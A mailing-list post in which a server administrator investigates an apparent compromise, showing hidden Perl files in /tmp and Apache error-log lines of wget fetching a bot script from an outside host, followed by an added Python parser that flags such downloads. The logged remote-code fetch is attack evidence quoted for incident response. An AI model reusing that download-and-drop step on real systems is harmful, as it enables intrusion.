Am I Compromised -- Some interesting findings
Here's what I found out with more digging in the logs.
There are 3 hidden files (attached to this message) in /tmp/:
1) .fuhrer
2) .fuhrer2
3) .fuhrer3
ns1:/var/log/apache2# ls -la /tmp/
total 56
drwxrwxrwt 5 root root 4096 Nov 25 07:46 .
drwxr-xr-x 26 root root 4096 Nov 25 04:49 ..
drwxrwxrwt 2 root root 4096 Nov 21 23:32 .ICE-unix
drwxrwxrwt 2 root root 4096 Nov 21 23:32 .X11-unix
-rw-r--r-- 1 www-data www-data 3673 Nov 25 00:30 .fuhrer
-rw-r--r-- 1 www-data www-data 18698 Nov 25 06:11 .fuhrer2
-rw-r--r-- 1 www-data www-data 0 Nov 25 08:10 .fuhrer3
-rw------- 1 www-data www-data 71 Nov 23 03:28 sess_07f541a848d0dd70fc87c3aed1691c87
-rw------- 1 www-data www-data 864 Nov 23 01:55 sess_8092654d49176bb860dca7fad5f50cce
-rw------- 1 www-data www-data 342 Nov 22 23:56 sess_e5e56ebacf7fcd31ea42d829e1f1f4fd
drwxrwxrwx 3 www-data www-data 4096 Nov 23 01:28 yappa-ng_cache
All these 3 are Perl scripts, so now it is clear that these are the Perl
scripts which are running from within Apache (I've enabled mod_perl in my
Apache installation) and eating up the CPU cycles.
Now let's look a little at /var/log/apache2/error.log:
Resolving maple.phpwebhosting.com... 70.86.76.34
Connecting to maple.phpwebhosting.com[70.86.76.34]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18,698 [text/plain]
0K .......... ........ 100% 210.37 KB/s
08:07:40 (210.37 KB/s) - `/tmp/.fuhrer2' saved [18698/18698]
--08:07:40-- http://maple.phpwebhosting.com/%7Edarkbroked/linuxdaybot.txt
=> `/tmp/.fuhrer2'
Resolving maple.phpwebhosting.com... 70.86.76.34
Connecting to maple.phpwebhosting.com[70.86.76.34]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18,698 [text/plain]
0K .......... ........ 100% 211.06 KB/s
08:07:40 (211.06 KB/s) - `/tmp/.fuhrer2' saved [18698/18698]
--08:07:40-- http://maple.phpwebhosting.com/%7Edarkbroked/linuxdaybot.txt
=> `/tmp/.fuhrer2'
Resolving maple.phpwebhosting.com... 70.86.76.34
Connecting to maple.phpwebhosting.com[70.86.76.34]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18,698 [text/plain]
0K .......... ........ 100% 210.52 KB/s
The logs show that the guy uploaded the files to /tmp and hid them.
In my first mail, the logs showed a lot of "sh" defunct processes executed
from within Apache. Is this an attempt to gain a shell through the web
server?
Please suggest what more I should look for and how to tackle this attack.
Regards,
rrs
--
Ritesh Raj Sarraf
RESEARCHUT -- http://www.researchut.com
Gnupg Key ID: 04F130BC
"Stealing logic from one person is plagiarism, stealing from many is
research."
"Necessity is the mother of invention."
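Added example, not part of the original mail: a small Python parser for the wget transcripts that land in Apache's error.log (wget writes its progress to stderr, which mod_perl/CGI children inherit from the server), flagging fetches that write dot-files into /tmp or similar scratch directories. The sample log is constructed; host, path and addresses are placeholders, not the values from the post.

```python
import re
from pathlib import Path

# Constructed sample: wget's stderr transcript as it appears in Apache's error.log
# when a CGI/mod_perl process spawns wget. Host, path and client IP are placeholders.
SAMPLE_ERROR_LOG = """\
--08:07:40--  http://example.invalid/%7Esomeuser/bot.txt
           => `/tmp/.fuhrer2'
Resolving example.invalid... 192.0.2.10
Connecting to example.invalid[192.0.2.10]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18,698 [text/plain]
08:07:40 (210.37 KB/s) - `/tmp/.fuhrer2' saved [18698/18698]
--08:09:02--  http://example.invalid/index.html
           => `/var/www/cache/index.html'
08:09:02 (95.10 KB/s) - `/var/www/cache/index.html' saved [512/512]
[Wed Nov 25 08:10:00 2005] [error] [client 192.0.2.20] File does not exist: /var/www/favicon.ico
"""

WGET_START = re.compile(r"^--(\d\d:\d\d:\d\d)--\s+(\S+)")
WGET_DEST = re.compile(r"^\s*=>\s*`([^']+)'")
WGET_SAVED = re.compile(r"^\d\d:\d\d:\d\d \(.*?\) - `([^']+)' saved \[(\d+)/(\d+)\]")

def find_wget_downloads(log_text):
    """Parse wget transcripts out of error.log: one dict per fetch (time, url, dest, bytes)."""
    downloads, current = [], None
    for line in log_text.splitlines():
        m = WGET_START.match(line)
        if m:
            current = {"time": m.group(1), "url": m.group(2), "dest": None, "bytes": None}
            downloads.append(current)
        elif current and (m := WGET_DEST.match(line)):
            current["dest"] = m.group(1)
        elif current and (m := WGET_SAVED.match(line)):
            current["dest"], current["bytes"] = m.group(1), int(m.group(2))
            current = None  # transcript for this fetch is complete

    return downloads

def is_suspicious_dest(path):
    """A dot-file dropped into a world-writable scratch dir: the pattern seen in the post."""
    p = Path(path)
    return str(p.parent) in ("/tmp", "/var/tmp", "/dev/shm") and p.name.startswith(".")

def suspicious_downloads(log_text):
    """Downloads whose destination matches is_suspicious_dest."""
    return [d for d in find_wget_downloads(log_text) if d["dest"] and is_suspicious_dest(d["dest"])]

if __name__ == "__main__":
    for d in suspicious_downloads(SAMPLE_ERROR_LOG):
        print(f"{d['time']} {d['url']} -> {d['dest']} ({d['bytes']} bytes)")
```

Running the same parser over the real error.log (cat error.log | python3 script.py, after swapping the sample for sys.stdin) lists every fetch the web server process made, with its destination path, which is the quickest way to see what else was pulled down besides the three files already found.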